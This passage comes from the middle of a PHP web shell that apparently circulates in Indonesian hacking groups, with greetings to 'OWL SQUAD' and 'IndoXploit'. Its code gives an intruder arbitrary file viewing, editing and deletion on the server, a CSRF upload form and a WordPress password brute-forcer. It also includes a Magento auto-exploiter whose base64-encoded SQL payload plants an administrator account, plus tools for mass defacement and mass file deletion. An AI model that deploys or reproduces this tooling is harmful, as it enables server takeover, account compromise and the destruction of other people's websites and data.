  4071. } elseif($_GET['act'] == 'view') {
  4072.     echo "<br>Filename: <font color=white>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>View</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>Edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>Rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>Download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>Hapus</a> ]<br><br>";
  4073.     echo "<textarea style='border-color=white' readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br><br>";
  4074. } elseif($_GET['act'] == 'edit') {
  4075.     if($_POST['save']) {
  4076.         $save = file_put_contents($_GET['file'], $_POST['src']);
  4077.         if($save) {
  4078.             $act = "<font color=white>Saved!</font>";
  4079.         } else {
  4080.             $act = "<font color=red>Gak dibolehin :'(</font>";
  4081.         }
  4082.     echo "".$act."<br>";
  4083.     }
  4084.     echo "<br>Filename: <font color=white>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>View</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>Edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>Rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>Download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>Hapus</a> ]<br><br>";
  4085.     echo "<form method='post'>
  4086.     <textarea style='border-color=white' name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br><br>
  4087.     <input type='submit' class='kotak' value='Simpan' name='save' style='border-color=white'>
  4088.     </form>";
  4089. } elseif($_GET['act'] == 'rename') {
  4090.     if($_POST['do_rename']) {
  4091.         $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
  4092.         if($rename) {
  4093.             $act = "<script>window.location='?dir=".$dir."';</script>";
  4094.         } else {
  4095.             $act = "<font color=red>Gak dibolehin, Jancok!</font>";
  4096.         }
  4097.     echo "".$act."<br>";
  4098.     }
  4099.     echo "<h1>Rename</h1>";
  4100.     echo "<br>Filename: <font color=white>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>View</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>Edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>Download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>Hapus</a> ]<br><br><br>";
  4101.     echo "<form method='post'>
  4102.     <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px; border-color=white' height='10'>
  4103.     <input type='submit' class='kotak' style='border-color=white' name='do_rename' value='Rename'>
  4104.     </form><br>";
  4105. }
  4106. elseif($_GET['666'] == 'csrf') {
  4107.     echo "<div style='text-align: left;' class='mybox'>
  4108.     <h1>CSRF Exploiter Online</h1><hr color='white'>
  4109.     <form method='post'>
  4110. URL: &nbsp&nbsp&nbsp&nbsp&nbsp&nbsp<input type='text' style='border:0;border-bottom:1px solid #292929; width:500px;' name='url' size='50' height='10' placeholder='http://127.0.0.1/[path]/upload.php' style='margin: 5px auto; padding-left: 5px;' required><br>
  4111. POST File: <input type='text' name='data' style='border:0;border-bottom:1px solid #292929; width:500px;' size='50' height='10' placeholder='Filedata / files[] / qqfile / userfile / dll' style='margin: 5px auto; padding-left: 5px;' required><br>
  4112. <br><input style='width: 50px; height: 30px; border-color=white;margin:10px 2px 0 2px;' class='kotak' type='submit' name='go' value='Lock!'>
  4113. </form></div>";
  4114. $url = $_POST['url'];
  4115. $data = $_POST['data'];
  4116. $submit = $_POST['go'];
  4117. if($submit) {
  4118.     echo "<br><form style='text-align:left' method='post' target='_blank' action='$url' enctype='multipart/form-data'><input type='file' name='$data'><input style='width: 50px; height: 30px; border-color=white;margin:10px 2px 0 2px;' type='submit' name='ok' class='kotak' value='Upload'>
  4119.     </form></div>";
  4120. }
  4121.     ;}
  4122. elseif($_GET['666'] == 'about') {
  4123.     echo "<link href='http://fonts.googleapis.com/css?family=Iceberg' rel='stylesheet' type='text/css'>";
  4124.     echo '<Center style="color:white">
  4125.         <font size="5pt" face="Iceberg"><font color="red" face="Iceberg">~</font> GREETZ <font color="red">~</font></font><br><font size="4pt">Official Member OWL SQUAD</font><br><br>and<br><br>
  4126.         <font size="4pt" face="Iceberg"><font color="red" face="Iceberg">[</font>
  4127.         T1KUS90T - EXI2T Cyber Team - Alone Clown Security - 6host Party Coders Team - BerdendangC0de - IndoXploit Coders Team - Xai Syndicate<font color="red">]</font></font>
  4128.         </center>
  4129. <br><br>Special Thanks :<br><a href="http://indoxploit.or.id" target="blank">IndoXploit Coders Team</a> - <a href="" target="blank">Con7ext [Xai Syndicate]</a>
  4130. </font>
  4131. ';
  4132. echo "<hr color='white'>";
  4133. echo "Contact: <a href='https://www.facebook.com/owlsquad.id'>facebook</a> - <a href='https://www.twitter.com/id_berandal'>Twitter</a>";
  4134. }
  4135. elseif($_GET['666'] == 'wpbrute') {
  4136.     set_time_limit(0);
  4137. error_reporting(0);
  4138. class berandal{
  4139.         private $host;
  4140.         private $user;
  4141.         private $open;
  4142.         private $list;
  4143. public function banner() {
  4144.    echo "<div class='mybox' style='text-align:left'>
  4145.     <h1>WordPress Brute Force</h1><hr color='white'>
  4146.     <form action='' method='POST'>
  4147.     Host<input type='text' name='host' style='border:0;border-bottom:1px solid #292929; width:500px;' placeholder='http://127.0.0.1/' size='40'><br><br>
  4148.     User<input type='text' name='user' style='border:0;border-bottom:1px solid #292929; width:500px;' value='admin' size='25'><br><br>
  4149.     Wordlist:
  4150.     <textarea class='mybox' rows='10' style='border-color:#292929;' name='list'></textarea><br>Need more? <a href='http://pastebin.com/u/berandal666' target='blank'>Click here</a>.<br>
  4151.     <input type='Submit' class='kotak' style='width: 50px; height: 30px; border-color=white;margin:10px 2px 0 2px;' value='Start'>
  4152.     </form></div>
  4153.     ";
  4154.  
  4155. }
  4156.  
  4157.     public function extract_post() {
  4158.          $this->host = $_POST["host"];
  4159.          $this->user = $_POST["user"];
  4160.          $this->open = $_POST["list"];
  4161.        }
  4162.  
  4163.        public function Xregex() {
  4164.          if(preg_match("@/wp-login.php@", $this->host)) {
  4165.              return true;
  4166.          } else {
  4167.             $this->host = $_POST["host"]."/wp-login.php";
  4168.          }
  4169.      }
  4170.  
  4171.       public function brute() {
  4172.            $list = array_filter(explode("\n", $this->open));
  4173.            foreach($list as $this->list) {
  4174.            for($i=0; $i < count($this->list); $i++) {
  4175.                         $this->Xcurl();
  4176.                      }
  4177.               }
  4178.        }
  4179.  
  4180.         private function cool() {
  4181.             echo "[+] Host:"."<font color='black'>{$this->host}</font>";
  4182.             echo " <br/>[+] User:"."<font color='black'>{$this->user}</font>";
  4183.             echo " <br/>[+] Pass:"."<font color='black'>{$this->list}</font>";
  4184.         }
  4185.  
  4186.         private function Xcurl() {
  4187.             $curl = curl_init();
  4188.             curl_setopt($curl, CURLOPT_URL, $this->host);
  4189.             curl_setopt($curl, CURLOPT_USERAGENT, $this->useragent);
  4190.             curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
  4191.             curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 10);
  4192.             curl_setopt($curl, CURLOPT_POST, true);
  4193.             curl_setopt($curl, CURLOPT_POSTFIELDS, "log=$this->user&pwd=$this->list&wp-submit=Login&redirect_to=$this->host/wp-admin/");
  4194.             $exec = curl_exec($curl);
  4195.             $http = curl_getinfo($curl, CURLINFO_HTTP_CODE);
  4196.             $this->cool();
  4197.             if($http == 302) {
  4198.                  echo "<font color='lime'> <br/>[+] Sukses! [+] Tinggal Login Aja</font><br>";
  4199.                  break;
  4200.             } else {
  4201.                 echo "<font color='red'><br/>[+] Ggal Jancok! -_-</font><br>";
  4202.             }
  4203.                 curl_close($curl);
  4204.         }
  4205. }
  4206.  
  4207. $wp = new berandal();
  4208. $wp->useragent = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0";
  4209. $wp->banner();
  4210. $wp->extract_post();
  4211. $wp->Xregex();
  4212. $wp->brute();
  4213.     }
  4214. elseif($_GET['666'] == 'magento') {
  4215.  echo '<div class="mybox"><h1>Magento Auto Exploiter</h1>
  4216. <form method="post" action="">
  4217. <textarea placeholder="http://127.0.0.1/" class="mybox" rows="10" name="target" required></textarea><br><br>
  4218. <input class="kotak" type=submit name=submit value="Start"><br>
  4219. </form></div>';
  4220. error_reporting(0);
  4221. set_time_limit(0);
  4222.  
  4223. function bersihkan($htmltags) {
  4224.     $htmltags = str_replace('<span class="price">','',$htmltags);
  4225.     $htmltags = str_replace('</span>','',$htmltags);
  4226.     return $htmltags;
  4227.    
  4228. }
  4229.  
  4230. ///postdata
  4231. $postadm = "filter=cG9wdWxhcml0eVtmcm9tXT0wJnBvcHVsYXJpdHlbdG9dPTMmcG9wdWxhcml0eVtmaWVsZF9leHByXT0wKTtTRVQgQFNBTFQgPSAncnAnO1NFVCBAUEFTUyA9IENPTkNBVChNRDUoQ09OQ0FUKCBAU0FMVCAsICdzdHVwaWQ0OCcpICksIENPTkNBVCgnOicsIEBTQUxUICkpO1NFTEVDVCBARVhUUkEgOj0gTUFYKGV4dHJhKSBGUk9NIGFkbWluX3VzZXIgV0hFUkUgZXh0cmEgSVMgTk9UIE5VTEw7SU5TRVJUIElOVE8gYGFkbWluX3VzZXJgIChgZmlyc3RuYW1lYCwgYGxhc3RuYW1lYCxgZW1haWxgLGB1c2VybmFtZWAsYHBhc3N3b3JkYCxgY3JlYXRlZGAsYGxvZ251bWAsYHJlbG9hZF9hY2xfZmxhZ2AsYGlzX2FjdGl2ZWAsYGV4dHJhYCxgcnBfdG9rZW5gLGBycF90b2tlbl9jcmVhdGVkX2F0YCkgVkFMVUVTICgnRmlyc3RuYW1lJywnTGFzdG5hbWUnLCdlbWFpbEBleGFtcGxlLmNvbScsJ3N0dXBpZCcsQFBBU1MsTk9XKCksMCwwLDEsQEVYVFJBLE5VTEwsIE5PVygpKTtJTlNFUlQgSU5UTyBgYWRtaW5fcm9sZWAgKHBhcmVudF9pZCx0cmVlX2xldmVsLHNvcnRfb3JkZXIscm9sZV90eXBlLHVzZXJfaWQscm9sZV9uYW1lKSBWQUxVRVMgKDEsMiwwLCdVJywoU0VMRUNUIHVzZXJfaWQgRlJPTSBhZG1pbl91c2VyIFdIRVJFIHVzZXJuYW1lID0gJ3N0dXBpZCcpLCdGaXJzdG5hbWUnKTs%3D&___directive=e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ&forwarded=1";
  4232. $postlog = "form_key=3ryAIBlm7bJ3naj9&login%5Busername%5D=berandal&login%5Bpassword%5D=berandal";
  4233. $postdwn = "username=berandal&password=berandal";
  4234. $pageadm = "/admin/Cms_Wysiwyg/directive/index/";
  4235. $pagelog = "/admin/";
  4236. $pagedwn = "/downloader/";
  4237.  
  4238. function berandal_CURL($url,$data,$page) {
  4239. $ch = curl_init();
  4240. curl_setopt ($ch, CURLOPT_URL, $url.$page);
  4241. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6");
  4242. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  4243. curl_setopt ($ch, CURLOPT_POSTFIELDS, $data);
  4244. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
  4245. curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
  4246. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
  4247. curl_setopt ($ch, CURLOPT_POST, 1);
  4248. $headers  = array();
  4249. $headers[] = 'Content-Type: application/x-www-form-urlencoded';
  4250.  
  4251. curl_setopt ($ch, CURLOPT_HTTPHEADER, $headers);
  4252. curl_setopt ($ch, CURLOPT_HEADER, 1);
  4253. $result = curl_exec ($ch);
  4254. curl_close($ch);
  4255. return $result;
  4256. }
  4257. print $banner;
  4258.  
  4259. if(isset($_POST['target'])){
  4260. $j=explode("\r\n",$_POST['target']);
  4261. foreach($j as $site){
  4262.  
  4263.     echo'<div class="mybox"><font color="white">';
  4264. print "Checking, Please wait!
  4265. <br>";
  4266. echo'</font>';
  4267. $sikat = berandal_CURL($site , $postadm, $pageadm);
  4268.  
  4269. if(preg_match('#200 OK#', $sikat)) {
  4270.     $expres = "Success";
  4271.     $ceklog = berandal_CURL($site , $postlog, $pagelog);
  4272.    
  4273. if(preg_match('#302 Moved#', $ceklog)) {
  4274.     preg_match_all('#<span>(.*?)</span>#si', $ceklog, $match);
  4275.     foreach($match as $val)
  4276.     {
  4277.     $ltm = $val[0];
  4278.     $avo = $val[1];
  4279.     break;
  4280.     }
  4281.     $admlog = "Sukses!";
  4282.     $user = "berandal";
  4283.     $pass = "berandal";
  4284.     $cekdwn = berandal_CURL($site , $postdwn, $pagedwn);
  4285.     if(preg_match('#Return to Admin#', $cekdwn)) {
  4286.     $dwnlog = "Login Sukses!";
  4287. }else {
  4288.     $dwnlog = "Login Gagal anjg!";
  4289. }
  4290. }else {
  4291.     $admlog = "Gagal!";
  4292.     $user = "NULL";
  4293.     $pass = "NULL";
  4294. }
  4295. }else {
  4296.     $admlog = "Gagal!";
  4297.     $expres = "Gagal!";
  4298.     $user = "NULL";
  4299.     $pass = "NULL";
  4300.     $dwnlog = "Login Gagal Anjg!";
  4301.     $ltm = "NULL";
  4302.     $avo = "NULL";
  4303. }
  4304.  
  4305. ///echo result
  4306. $logger = '
  4307. <br>
  4308.     <font color="white">
  4309.     <h4>[ '.$site.' ]</h4></font><br>
  4310.     Exploiting  : <font color="lime">'.$expres.'</font><br>
  4311.     Login Admin : <font color="lime">'.$admlog.'</font><br>
  4312.     Lifetime Sales: <font color="gold">'.bersihkan($ltm).'</font><br>
  4313.     Average Order   : <font color="gold">'.bersihkan($avo).'</font><br>
  4314.     Downloader  : <font color="white">'.$dwnlog.'</font><br>
  4315.     Username    :<font color="cyan"><b> '.$user.'</font></b><br>
  4316.     Password    :<font color="cyan"><b> '.$pass.'</font></b><br>
  4317.     </div>';
  4318.     echo $logger;
  4319. ///diilangin
  4320. }
  4321. }
  4322. }
  4323. elseif($_GET['666'] == 'mass_deface') {
  4324.     echo "<div class='mybox'><center><form action=\"\" method=\"post\">\n";
  4325.     $dirr=$_POST['d_dir'];
  4326.     $index = $_POST["script"];
  4327.     $index = str_replace('"',"'",$index);
  4328.     $index = stripslashes($index);
  4329.     function edit_file($file,$index){
  4330.         if (is_writable($file)) {
  4331.         clear_fill($file,$index);
  4332.         echo "<Span style='color:lime;'><strong> [+] Nyabun 100% Sukses, COk! </strong></span><br></center>";
  4333.         }
  4334.         else {
  4335.             echo "<Span style='color:red;'><strong> [-] Ternyata Tidak Boleh Menyabun Disini :( </strong></span><br></center>";
  4336.             }
  4337.             }
  4338.     function hapus_massal($dir,$namafile) {
  4339.         if(is_writable($dir)) {
  4340.             $dira = scandir($dir);
  4341.             foreach($dira as $dirb) {
  4342.                 $dirc = "$dir/$dirb";
  4343.                 $lokasi = $dirc.'/'.$namafile;
  4344.                 if($dirb === '.') {
  4345.                     if(file_exists("$dir/$namafile")) {
  4346.                         unlink("$dir/$namafile");
  4347.                     }
  4348.                 } elseif($dirb === '..') {
  4349.                     if(file_exists("".dirname($dir)."/$namafile")) {
  4350.                         unlink("".dirname($dir)."/$namafile");
  4351.                     }
  4352.                 } else {
  4353.                     if(is_dir($dirc)) {
  4354.                         if(is_writable($dirc)) {
  4355.                             if(file_exists($lokasi)) {
  4356.                                 echo "[<font color=white>DELETED</font>] $lokasi<br>";
  4357.                                 unlink($lokasi);
  4358.                                 $berandal = hapus_massal($dirc,$namafile);
  4359.                             }
  4360.                         }
  4361.                     }
  4362.                 }
  4363.             }
  4364.         }
  4365.     }
  4366.     function clear_fill($file,$index){
  4367.         if(file_exists($file)){
  4368.             $handle = fopen($file,'w');
  4369.             fwrite($handle,'');
  4370.             fwrite($handle,$index);
  4371.             fclose($handle);  } }
  4372.  
  4373.     function gass(){
  4374.         global $dirr , $index ;
  4375.         chdir($dirr);
  4376.         $me = str_replace(dirname(__FILE__).'/','',__FILE__);
  4377.         $files = scandir($dirr) ;
  4378.         $notallow = array(".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","..",".");
  4379.         sort($files);
  4380.         $n = 0 ;
  4381.         foreach ($files as $file){
  4382.             if ( $file != $me && is_dir($file) != 1 && !in_array($file, $notallow) ) {
  4383.                 echo "<center><Span style='color: #8A8A8A;'><strong>$dirr/</span>$file</strong> ====> ";
  4384.                 edit_file($file,$index);
  4385.                 flush();
  4386.                 $n = $n +1 ;
  4387.                 }
  4388.                 }
  4389.                 echo "<br>";
  4390.                 echo "<center><br><h3>$n Kali lu Ngecrot  Disini :v</h3></center><br>";
  4391.                     }
  4392.     function ListFiles($dirrall) {
  4393.  
  4394.     if($dh = opendir($dirrall)) {
  4395.  
  4396.        $files = Array();
  4397.        $inner_files = Array();
  4398.        $me = str_replace(dirname(__FILE__).'/','',__FILE__);
  4399.        $notallow = array($me,".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","Thumbs.db");
  4400.         while($file = readdir($dh)) {
  4401.             if($file != "." && $file != ".." && $file[0] != '.' && !in_array($file, $notallow) ) {
  4402.                 if(is_dir($dirrall . "/" . $file)) {
  4403.                     $inner_files = ListFiles($dirrall . "/" . $file);
  4404.                     if(is_array($inner_files)) $files = array_merge($files, $inner_files);
  4405.                 } else {
  4406.                     array_push($files, $dirrall . "/" . $file);
  4407.                 }
  4408.             }
  4409.             }
  4410.  
  4411.             closedir($dh);
  4412.             return $files;
  4413.         }
  4414.     }
  4415.     function gass_all(){
  4416.         global $index ;
  4417.         $dirrall=$_POST['d_dir'];
  4418.         foreach (ListFiles($dirrall) as $key=>$file){
  4419.             $file = str_replace('//',"/",$file);
  4420.             echo "<center><strong>$file</strong> ===>";
  4421.             edit_file($file,$index);
  4422.             flush();
  4423.         }
  4424.         $key = $key+1;
  4425.     echo "<center><br><h3>$key Kali lu Ngecrot  Disini  :v</h3></center><br>"; }
  4426.     function sabun_massal($dir,$namafile,$isi_script) {
  4427.         if(is_writable($dir)) {
  4428.             $dira = scandir($dir);
  4429.             foreach($dira as $dirb) {
  4430.                 $dirc = "$dir/$dirb";
  4431.                 $lokasi = $dirc.'/'.$namafile;
  4432.                 if($dirb === '.') {
  4433.                     file_put_contents($lokasi, $isi_script);
  4434.                 } elseif($dirb === '..') {
  4435.                     file_put_contents($lokasi, $isi_script);
  4436.                 } else {
  4437.                     if(is_dir($dirc)) {
  4438.                         if(is_writable($dirc)) {
  4439.                             echo "[<font color=white>Selese Cok!</font>] $lokasi<br>";
  4440.                             file_put_contents($lokasi, $isi_script);
  4441.                             $berandal = sabun_massal($dirc,$namafile,$isi_script);
  4442.                         }
  4443.                     }
  4444.                 }
  4445.             }
  4446.         }
  4447.     }
  4448.     if($_POST['mass'] == 'onedir') {
  4449.         echo "<br> Versi Text Area<br><textarea style='background:black;outline:none;color:white;' name='index' rows='10' cols='67'>\n";
  4450.         $ini="http://";
  4451.         $mainpath=$_POST[d_dir];
  4452.         $file=$_POST[d_file];
  4453.         $dir=opendir("$mainpath");
  4454.         $code=base64_encode($_POST[script]);
  4455.         $indx=base64_decode($code);
  4456.         while($row=readdir($dir)){
  4457.         $start=@fopen("$row/$file","w+");
  4458.         $finish=@fwrite($start,$indx);
  4459.         if ($finish){
  4460.             echo"$ini$row/$file\n";
  4461.             }
  4462.         }
  4463.         echo "</textarea><br><br><br><b>Versi Text</b><br><br><br>\n";
  4464.         $mainpath=$_POST[d_dir];$file=$_POST[d_file];
  4465.         $dir=opendir("$mainpath");
  4466.         $code=base64_encode($_POST[script]);
  4467.         $indx=base64_decode($code);
  4468.         while($row=readdir($dir)){$start=@fopen("$row/$file","w+");
  4469.         $finish=@fwrite($start,$indx);
  4470.         if ($finish){echo '<a href="http://' . $row . '/' . $file . '" target="_blank">http://' . $row . '/' . $file . '</a><br>'; }
  4471.         }
  4472.  
  4473.     }
  4474.     elseif($_POST['mass'] == 'sabunkabeh') { gass(); }
  4475.     elseif($_POST['mass'] == 'hapusmassal') { hapus_massal($_POST['d_dir'], $_POST['d_file']); }
  4476.     elseif($_POST['mass'] == 'sabunmematikan') { gass_all(); }
  4477.     elseif($_POST['mass'] == 'massdeface') {
  4478.         echo "<div style='margin: 5px auto; padding: 5px'>";
  4479.         sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  4480.         echo "</div>";  }
  4481.     else {
  4482.         echo "
  4483.         <center><h1>Mass Deface</h1><hr color='white'><font style='text-decoration: underline;'>
  4484.         Pilih yang mana:<br>
  4485.         </font>
  4486.         <select class=\"select\" name=\"mass\"  style=\"width: 450px;\" height=\"10\">
  4487.         <option value=\"onedir\">Mass Deface 1 Dir</option>
  4488.         <option value=\"massdeface\">Mass Deface ALL Dir</option>
  4489.         <option value=\"sabunkabeh\">Sabun Massal Di Tempat</option>
  4490.         <option value=\"sabunmematikan\">Sabun Massal Bunuh Diri</option>
  4491.         <option value=\"hapusmassal\">Mass Delete Files</option></center></select><br>
  4492.         <font color='white' style='text-decoration: underline;'>Folder:</font><br>
  4493.         <input type='text' name='d_dir' value='$dir' style='width: 450px; color:white;' height='10'><br>
  4494.         <font color='white' style='text-decoration: underline;'>Nama File:</font><br>
  4495.         <input type='text' name='d_file' value='index.php' style='width: 450px; color:white;' height='10'><br>
  4496.         <font color='white' style='text-decoration: underline;'>Index File:</font><br>
  4497.         <textarea name='script' style='width: 450px; height: 200px; color:white;'>Touched by Berandal</textarea><br>
  4498.         <input type='submit' class='kotak' name='start' value='Mass Deface' style='width: 450px;'>
  4499.         </form></center></div>";
  4500.         }
  4501.     }
  4502. elseif($_GET['666'] == 'phinfo')
  4503. {@ob_start();@eval("phpinfo();");$buff = @ob_get_contents();@ob_end_clean();$awal = strpos($buff,"<body>")+6;$akhir = strpos($buff,"</body>");echo "<div class='mybox'><div class='phpinfo'>".substr($buff,$awal,$akhir-$awal)."</div></div>";}
  4504. elseif($_GET['act'] == 'delete') {
  4505.     $delete = unlink($_GET['file']);
  4506.     if($delete) {
  4507.         $act = "<script>window.location='?dir=".$dir."';</script>";
  4508.     } else {
  4509.         $act = "<font color=red>Gak dibolehin, Jancok!</font>";
  4510.     }
  4511.     echo $act;
  4512. }else {
  4513.     if(is_dir($dir) == true) {
  4514.         echo '<div class="mybox"><table width="100%" class="table_home" border="1" cellpadding="3" cellspacing="1" align="center">
  4515.         <tr>
  4516.         <th style="min-width:150px;" class="th_home"><center>Name</center></th>
  4517.         <th class="th_home"><center>Type</center></th>
  4518.         <th style="width:74px;min-width:74px;" class="th_home"><center>Size</center></th>
  4519.         <th style="width:150px;min-width:150px;" class="th_home"><center>Modified</center></th>
  4520.         <th style="width:80px;min-width:80px;" class="th_home"><center>Perms</center></th>
  4521.         <th style="width:200px;min-width:200px;" class="th_home"><center>Action</center></th>
  4522.         </tr>';
  4523.         $scandir = scandir($dir);
  4524.         foreach($scandir as $dirx) {
  4525.             $dtype = filetype("$dir/$dirx");
  4526.             $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
  4527.             if(!is_dir("$dir/$dirx")) continue;
  4528.             if($dirx === '..') {
  4529.                 $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
  4530.             } elseif($dirx === '.') {
  4531.                 $href = "<a href='?dir=$dir'>$dirx</a>";
  4532.             } else {
  4533.                 $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
  4534.             }
  4535.             if($dirx === '.' || $dirx === '..') {
  4536.                 $act_dir = "<a href='?act=newfile&dir=$dir'>+file</a> <font color='white'>|</font> <a href='?act=newfolder&dir=$dir'>+dir</a>";
  4537.                 } else {
  4538.                 $act_dir = "<a href='?&dir=$dir/$dirx'>view</a>&nbsp&nbsp| <a href='?act=rename_dir&dir=$dir/$dirx'>ren</a><font color='white'>&nbsp&nbsp|</font> <a href='?dir=$dir&666=upload'>upl</a><font color='white'>&nbsp|</font> <a href='?act=delete_dir&dir=$dir/$dirx'>del</a> | <a href='?act=download_dir&dir=$dir/$dirx'>dl</a>";
  4539.             }
  4540.             echo "<tr>";
  4541.             echo "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAQAAAC1+jfqAAAAAXNSR0IArs4c6QAAAAJiS0dEAP+Hj8y/AAAACXBIWXMAAAsTAAALEwEAmpwYAAAA00lEQVQoz6WRvUpDURCEvzmuwR8s8gr2ETvtLSRaKj6ArZU+VVAEwSqvJIhIwiX33nPO2IgayK2cbtmZWT4W/iv9HeacA697NQRY281Fr0du1hJPt90D+xgc6fnwXjC79JWyQdiTfOrf4nk/jZf0cVenIpEQImGjQsVod2cryvH4TEZC30kLjME+KUdRl24ZDQBkryIvtOJggLGri+hbdXgd90e9++hz6rR5jYtzZKsIDzhwFDTQDzZEsTz8CRO5pmVqB240ucRbM7kejTcalBfvn195EV+EajF1hgAAAABJRU5ErkJggg=='>$href</td>";
  4542.             echo "<td class='td_home'><center>$dtype</center></td>";
  4543.             echo "<td class='td_home'><center>-</center></th>";
  4544.             echo "<td class='td_home'><center>$dtime</center></td>";
  4545.             echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
  4546.             echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
  4547.         }
  4548.         echo "</tr>";
  4549.         foreach($scandir as $file) {
  4550.             $ftype = filetype("$dir/$file");
  4551.             $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
  4552.             $size = filesize("$dir/$file")/1024;
  4553.             $size = round($size,3);
  4554.             if($size > 1024) {
  4555.                 $size = round($size/1024,2). 'MB';
  4556.             } else {
  4557.                 $size = $size. 'KB';
  4558.             }
  4559.             if(!is_file("$dir/$file")) continue;
  4560.             echo "<tr>";
  4561.             echo "<td style='min-width:150px;' class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
  4562.             echo "<td style='width:74px;min-width:74px;' class='td_home'><center>$ftype</center></td>";
  4563.             echo "<td class='td_home'><center>$size</center></td>";
  4564.             echo "<td class='td_home'><center>$ftime</center></td>";
  4565.             echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
  4566.             echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=view&dir=$dir&file=$dir/$file'>view</a>&nbsp&nbsp| <a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a><font color='white'>&nbsp|</font> <a href='?act=rename&dir=$dir&file=$dir/$file'>ren</a> <font color='white'>|</font> <a href='?act=delete&dir=$dir&file=$dir/$file'>del</a> <font color='white'>|</font> <a href='?act=download&dir=$dir&file=$dir/$file'>dl</a></td>";
  4567.         }
  4568.         echo "</tr></table></div>";
  4569.     } else {
  4570.         echo "<font color=red>Gabisa buka directory :(</font>";
  4571.     }
  4572.     }
  4573.  
  4574. echo "<center>
